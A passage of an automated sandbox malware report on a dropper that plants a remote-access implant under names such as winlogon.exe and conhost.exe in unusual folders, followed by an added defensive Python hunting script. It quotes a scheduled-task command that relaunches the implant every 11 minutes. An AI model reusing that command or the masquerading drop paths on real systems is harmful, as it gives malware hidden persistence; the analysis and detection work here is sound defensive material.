Source: C:\Windows\System32\schtasks.exe | Section loaded: sspicli.dll (each of the 12 schtasks.exe instances)
Source: C:\Windows\System32\schtasks.exe | Section loaded: xmllite.dll (each of the 12 schtasks.exe instances)
Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe | Section loaded: mscoree.dll
Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe | Section loaded: apphelp.dll
Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe | Section loaded: version.dll
Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe | Section loaded: uxtheme.dll
Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe | Section loaded: windows.storage.dll
Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe | Section loaded: wldp.dll
Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe | Section loaded: profapi.dll
Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe | Section loaded: cryptsp.dll
Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe | Section loaded: rsaenh.dll
Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe | Section loaded: cryptbase.dll
Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe | Section loaded: sspicli.dll
Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe | Section loaded: amsi.dll
Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe | Section loaded: userenv.dll
Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe | Section loaded: wbemcomn.dll
Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe | Section loaded: iphlpapi.dll
Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe | Section loaded: dnsapi.dll
Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe | Section loaded: dhcpcsvc.dll
Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe | Section loaded: winnsi.dll
Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe | Section loaded: rasapi32.dll
Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe | Section loaded: rasman.dll
Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe | Section loaded: rtutils.dll
Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe | Section loaded: mswsock.dll
Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe | Section loaded: winhttp.dll
Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe | Section loaded: rasadhlp.dll
Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe | Section loaded: secur32.dll
Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe | Section loaded: schannel.dll
Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe | Section loaded: mskeyprotect.dll
Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe | Section loaded: ntasn1.dll
Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe | Section loaded: ncrypt.dll
Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe | Section loaded: ncryptsslp.dll
Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe | Section loaded: msasn1.dll
Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\cmd.exe | Section loaded: cmdext.dll
Source: C:\Windows\System32\cmd.exe | Section loaded: apphelp.dll
Source: C:\Windows\System32\w32tm.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\System32\w32tm.exe | Section loaded: logoncli.dll
Source: C:\Windows\System32\w32tm.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\w32tm.exe | Section loaded: ntmarta.dll
Source: C:\Windows\System32\w32tm.exe | Section loaded: ntdsapi.dll
Source: C:\Windows\System32\w32tm.exe | Section loaded: mswsock.dll
Source: C:\Windows\System32\w32tm.exe | Section loaded: dnsapi.dll
Source: C:\Windows\System32\w32tm.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\System32\w32tm.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\w32tm.exe | Section loaded: kernel.appcore.dll
Source: C:\brokermonitordhcp\HuzhgkcqwYiFfxvhdfMUs.exe | Section loaded: mscoree.dll
Source: C:\brokermonitordhcp\HuzhgkcqwYiFfxvhdfMUs.exe | Section loaded: apphelp.dll
Source: C:\brokermonitordhcp\HuzhgkcqwYiFfxvhdfMUs.exe | Section loaded: kernel.appcore.dll
Source: C:\brokermonitordhcp\HuzhgkcqwYiFfxvhdfMUs.exe | Section loaded: version.dll
Source: C:\brokermonitordhcp\HuzhgkcqwYiFfxvhdfMUs.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\brokermonitordhcp\HuzhgkcqwYiFfxvhdfMUs.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\brokermonitordhcp\HuzhgkcqwYiFfxvhdfMUs.exe | Section loaded: uxtheme.dll
Source: C:\brokermonitordhcp\HuzhgkcqwYiFfxvhdfMUs.exe | Section loaded: windows.storage.dll
Source: C:\brokermonitordhcp\HuzhgkcqwYiFfxvhdfMUs.exe | Section loaded: wldp.dll
Source: C:\brokermonitordhcp\HuzhgkcqwYiFfxvhdfMUs.exe | Section loaded: profapi.dll
Source: C:\brokermonitordhcp\HuzhgkcqwYiFfxvhdfMUs.exe | Section loaded: cryptsp.dll
Source: C:\brokermonitordhcp\HuzhgkcqwYiFfxvhdfMUs.exe | Section loaded: rsaenh.dll
Source: C:\brokermonitordhcp\HuzhgkcqwYiFfxvhdfMUs.exe | Section loaded: cryptbase.dll
Source: C:\brokermonitordhcp\HuzhgkcqwYiFfxvhdfMUs.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\QIKiV83Pkl.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\brokermonitordhcp\portruntime.exe | Directory created: C:\Program Files\Windows Photo Viewer\en-GB\HuzhgkcqwYiFfxvhdfMUs.exe
Source: C:\brokermonitordhcp\portruntime.exe | Directory created: C:\Program Files\Windows Photo Viewer\en-GB\be621495aa6c7b
Source: C:\brokermonitordhcp\portruntime.exe | Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\winlogon.exe
Source: C:\brokermonitordhcp\portruntime.exe | Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\cc11b995f2a76d
Source: QIKiV83Pkl.exe | Static file information: File size 2777219 > 1048576
Source: QIKiV83Pkl.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: QIKiV83Pkl.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: QIKiV83Pkl.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: QIKiV83Pkl.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: QIKiV83Pkl.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: QIKiV83Pkl.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: QIKiV83Pkl.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: QIKiV83Pkl.exe
Source: QIKiV83Pkl.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: QIKiV83Pkl.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: QIKiV83Pkl.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: QIKiV83Pkl.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: QIKiV83Pkl.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: C:\Users\user\Desktop\QIKiV83Pkl.exe | File created: C:\brokermonitordhcp\__tmp_rar_sfx_access_check_5730812
Source: QIKiV83Pkl.exe | Static PE information: section name: .didat
Source: C:\Users\user\Desktop\QIKiV83Pkl.exe | Code function: 0_2_0088E28C push eax; ret 0_2_0088E2AA
Source: C:\Users\user\Desktop\QIKiV83Pkl.exe | Code function: 0_2_0088ED46 push ecx; ret 0_2_0088ED59
Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe | Code function: 21_2_00007FFAAC489178 pushad ; ret 21_2_00007FFAAC489179
Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe | Code function: 21_2_00007FFAAC48055E push ds; retf 21_2_00007FFAAC48055F
Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe | Code function: 21_2_00007FFAAC47EC5F pushad ; retf 21_2_00007FFAAC47EC60

            Persistence and Installation Behavior

Source: C:\brokermonitordhcp\portruntime.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create (21 calls)
Source: C:\brokermonitordhcp\portruntime.exe | File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\winlogon.exe
Source: C:\brokermonitordhcp\portruntime.exe | File created: C:\brokermonitordhcp\HuzhgkcqwYiFfxvhdfMUs.exe
Source: C:\brokermonitordhcp\portruntime.exe | File created: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe
Source: C:\brokermonitordhcp\portruntime.exe | File created: C:\Windows\Downloaded Program Files\HuzhgkcqwYiFfxvhdfMUs.exe
Source: C:\brokermonitordhcp\portruntime.exe | File created: C:\Users\Default\conhost.exe
Source: C:\brokermonitordhcp\portruntime.exe | File created: C:\Users\jones\HuzhgkcqwYiFfxvhdfMUs.exe
Source: C:\brokermonitordhcp\portruntime.exe | File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\winlogon.exe
Source: C:\brokermonitordhcp\portruntime.exe | File created: C:\Program Files\Windows Photo Viewer\en-GB\HuzhgkcqwYiFfxvhdfMUs.exe
Source: C:\Users\user\Desktop\QIKiV83Pkl.exe | File created: C:\brokermonitordhcp\portruntime.exe

            Boot Survival

Source: C:\brokermonitordhcp\portruntime.exe | File created: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe
Source: C:\brokermonitordhcp\portruntime.exe | File created: C:\Users\Default\conhost.exe
Source: C:\brokermonitordhcp\portruntime.exe | File created: C:\Users\jones\HuzhgkcqwYiFfxvhdfMUs.exe
Source: C:\brokermonitordhcp\portruntime.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 11 /tr "'C:\Users\Default\conhost.exe'" /f
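The scheduled task above (an every-11-minutes trigger whose payload is a conhost.exe under C:\Users\Default) and the binaries dropped in the previous section (winlogon.exe inside the Acrobat folder, conhost.exe in the Default profile, a payload under Downloaded Program Files) share one hunting idea: a Windows system process name, or a scheduled-task payload, sitting in a location where it does not belong. The following Python is an added hunting example, not code from this report or from DCRat. The list of system process names, the trusted and unusual directory lists and the 15-minute threshold are assumptions to tune per estate; the telemetry lines it runs over are constructed from the paths in this report plus one benign built-in task for contrast.

```python
"""Hunting helper for the persistence traits recorded in this report.

Added example, not code from the sandbox report or from the malware. One
path check is applied to two inputs: 'schtasks.exe /create' command lines
as seen in process-creation telemetry (Sysmon event 1, Security 4688), and
paths of dropped executables as listed under "File created". Sample inputs
are constructed from paths in this report.
"""
from __future__ import annotations

import re

# Windows binaries that legitimately run only from System32 / SysWOW64.
# Assumption: an illustrative short list; extend it for production use.
SYSTEM_PROCESS_NAMES = {
    "conhost.exe", "winlogon.exe", "csrss.exe", "lsass.exe",
    "svchost.exe", "dllhost.exe", "smss.exe", "services.exe",
}
TRUSTED_SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")

# Locations where a persisted executable is suspicious whatever its name.
# Assumption: the Default profile and "Downloaded Program Files" are taken
# from this report's drop locations; the other two are common equivalents.
UNUSUAL_PAYLOAD_DIRS = (
    "c:\\users\\default\\", "c:\\users\\public\\", "c:\\programdata\\",
    "c:\\windows\\downloaded program files\\",
)

# "/switch value" pairs: a value is one quoted string or one bare token, and
# a token that itself starts with "/" is the next switch, not a value.
_SWITCH_RE = re.compile(r'/(\w+)(?:\s+(?!/)("[^"]*"|\S+))?')
# First path-like token up to an executable extension (trailing args dropped).
_IMAGE_RE = re.compile(r"(.+?\.(?:exe|bat|cmd|vbs|js|ps1))(?:\s|$)", re.IGNORECASE)


def normalize_path(path: str) -> str:
    """Lower-case, drop surrounding quotes, expand the two common system variables."""
    p = path.strip().strip("\"'").lower()
    for var in ("%windir%", "%systemroot%"):
        p = p.replace(var, "c:\\windows")
    return p


def path_reasons(path: str) -> list[str]:
    """Reasons an executable path is suspicious as a persistence target (empty if none)."""
    p = normalize_path(path)
    directory, _, name = p.rpartition("\\")
    directory += "\\"
    reasons = []
    if name in SYSTEM_PROCESS_NAMES and not directory.startswith(TRUSTED_SYSTEM_DIRS):
        reasons.append(f"system process name {name} outside System32/SysWOW64")
    if directory.startswith(UNUSUAL_PAYLOAD_DIRS):
        reasons.append(f"payload in unusual directory {directory}")
    return reasons


def parse_schtasks_create(cmdline: str) -> dict[str, str] | None:
    """Return {switch: value} for a 'schtasks /create' command line, else None."""
    if not re.search(r"schtasks(?:\.exe)?\b", cmdline, re.IGNORECASE):
        return None
    switches = {k.lower(): v.strip("\"'") for k, v in _SWITCH_RE.findall(cmdline)}
    return switches if "create" in switches else None


def task_image(task_run: str) -> str:
    """Executable launched by a /tr value, with quotes and trailing arguments removed."""
    run = normalize_path(task_run)
    m = _IMAGE_RE.match(run)
    return m.group(1) if m else run.split(" ")[0]


def check_schtasks_cmdline(cmdline: str) -> list[str]:
    """Findings for one process-creation command line (empty if benign or not schtasks)."""
    sw = parse_schtasks_create(cmdline)
    if sw is None:
        return []
    reasons = path_reasons(task_image(sw.get("tr", "")))
    # A short MINUTE cadence is a watchdog pattern: the task relaunches the
    # implant whenever it is killed. Assumption: 15 minutes as the threshold.
    mo = sw.get("mo", "")
    if sw.get("sc", "").upper() == "MINUTE" and mo.isdigit() and int(mo) <= 15:
        reasons.append(f"high-frequency trigger: every {mo} minute(s)")
    return reasons


# Constructed telemetry: the schtasks command from this report, then a benign
# built-in task for contrast.
SAMPLE_CMDLINES = [
    'schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 11 /tr "\'C:\\Users\\Default\\conhost.exe\'" /f',
    'schtasks.exe /create /tn "\\Microsoft\\Windows\\Defrag\\ScheduledDefrag" /sc WEEKLY /d WED /tr "%windir%\\system32\\defrag.exe -c -h -o -$"',
]
# Dropped-file paths from this report, plus the legitimate conhost.exe location.
SAMPLE_DROPS = [
    r"C:\Program Files\Adobe\Acrobat DC\Acrobat\winlogon.exe",
    r"C:\Users\Default\conhost.exe",
    r"C:\Windows\Downloaded Program Files\HuzhgkcqwYiFfxvhdfMUs.exe",
    r"C:\Windows\System32\conhost.exe",
]

if __name__ == "__main__":
    for line in SAMPLE_CMDLINES:
        print(line, "->", check_schtasks_cmdline(line) or "no findings")
    for path in SAMPLE_DROPS:
        print(path, "->", path_reasons(path) or "no findings")
```

Run against the two constructed command lines, the report's task yields three findings (system-process name outside System32, payload in the Default profile, 11-minute trigger) while the Defrag task yields none; of the drop paths only the System32 conhost.exe passes clean. The same path logic is what the Sigma rules "Files With System Process Name In Unsuspected Locations" and "Execution from Suspicious Folder" listed at the top of this report express in rule form.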
Source: C:\Users\user\Desktop\QIKiV83Pkl.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\brokermonitordhcp\portruntime.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\brokermonitordhcp\HuzhgkcqwYiFfxvhdfMUs.exe Process information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
            Source: C:\brokermonitordhcp\portruntime.exe Memory allocated: DD0000 memory reserve | memory write watch
            Source: C:\brokermonitordhcp\portruntime.exe Memory allocated: 1ACD0000 memory reserve | memory write watch
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe Memory allocated: 16B0000 memory reserve | memory write watch
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe Memory allocated: 1B530000 memory reserve | memory write watch
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe Memory allocated: F40000 memory reserve | memory write watch
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe Memory allocated: 1AAF0000 memory reserve | memory write watch
            Source: C:\brokermonitordhcp\HuzhgkcqwYiFfxvhdfMUs.exe Memory allocated: 2760000 memory reserve | memory write watch
            Source: C:\brokermonitordhcp\HuzhgkcqwYiFfxvhdfMUs.exe Memory allocated: 1A860000 memory reserve | memory write watch
            Source: C:\brokermonitordhcp\portruntime.exe Thread delayed: delay time: 922337203685477
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe Thread delayed: delay time: 922337203685477
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe Thread delayed: delay time: 922337203685477
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe Thread delayed: delay time: 600000
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe Thread delayed: delay time: 599891
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe Thread delayed: delay time: 599781
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe Thread delayed: delay time: 599672
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe Thread delayed: delay time: 599563
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe Thread delayed: delay time: 599454
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe Thread delayed: delay time: 599329
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe Thread delayed: delay time: 599204
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe Thread delayed: delay time: 599079
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe Thread delayed: delay time: 598954
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe Thread delayed: delay time: 922337203685477
            Source: C:\brokermonitordhcp\HuzhgkcqwYiFfxvhdfMUs.exe Thread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\wscript.exe Window found: window name: WSH-Timer
            Source: C:\brokermonitordhcp\portruntime.exe Window / User API: threadDelayed 876
            Source: C:\brokermonitordhcp\portruntime.exe Window / User API: threadDelayed 1257
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe Window / User API: threadDelayed 367
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe Window / User API: threadDelayed 1325
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe Window / User API: threadDelayed 1289
            Source: C:\brokermonitordhcp\HuzhgkcqwYiFfxvhdfMUs.exe Window / User API: threadDelayed 549
            Source: C:\brokermonitordhcp\portruntime.exe TID: 6436 Thread sleep count: 876 > 30
            Source: C:\brokermonitordhcp\portruntime.exe TID: 6436 Thread sleep count: 1257 > 30
            Source: C:\brokermonitordhcp\portruntime.exe TID: 1660 Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe TID: 4532 Thread sleep count: 367 > 30
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe TID: 2032 Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe TID: 6220 Thread sleep count: 1325 > 30
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe TID: 6220 Thread sleep count: 1289 > 30
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe TID: 3944 Thread sleep time: -8301034833169293s >= -30000s
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe TID: 3944 Thread sleep time: -600000s >= -30000s
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe TID: 3944 Thread sleep time: -599891s >= -30000s
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe TID: 3944 Thread sleep time: -599781s >= -30000s
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe TID: 3944 Thread sleep time: -599672s >= -30000s
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe TID: 3944 Thread sleep time: -599563s >= -30000s
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe TID: 3944 Thread sleep time: -599454s >= -30000s
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe TID: 3944 Thread sleep time: -599329s >= -30000s
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe TID: 3944 Thread sleep time: -599204s >= -30000s
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe TID: 3944 Thread sleep time: -599079s >= -30000s
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe TID: 3944 Thread sleep time: -598954s >= -30000s
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe TID: 2092 Thread sleep time: -30000s >= -30000s
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe TID: 2860 Thread sleep time: -922337203685477s >= -30000s
            Source: C:\brokermonitordhcp\HuzhgkcqwYiFfxvhdfMUs.exe TID: 7080 Thread sleep count: 549 > 30
            Source: C:\brokermonitordhcp\HuzhgkcqwYiFfxvhdfMUs.exe TID: 1920 Thread sleep count: 262 > 30
            Source: C:\brokermonitordhcp\HuzhgkcqwYiFfxvhdfMUs.exe TID: 6416 Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
            Source: C:\Windows\System32\schtasks.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
            Source: C:\Windows\System32\schtasks.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
            Source: C:\Windows\System32\schtasks.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
            Source: C:\Windows\System32\schtasks.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
            Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
            Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
            Source: C:\brokermonitordhcp\portruntime.exe File Volume queried: C:\ FullSizeInformation
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe File Volume queried: C:\ FullSizeInformation
            Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe File Volume queried: C:\ FullSizeInformation
            Source: C:\brokermonitordhcp\HuzhgkcqwYiFfxvhdfMUs.exe File Volume queried: C:\ FullSizeInformation
            Source: C:\Users\user\Desktop\QIKiV83Pkl.exe Code function: 0_2_0087A5F4 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError, 0_2_0087A5F4
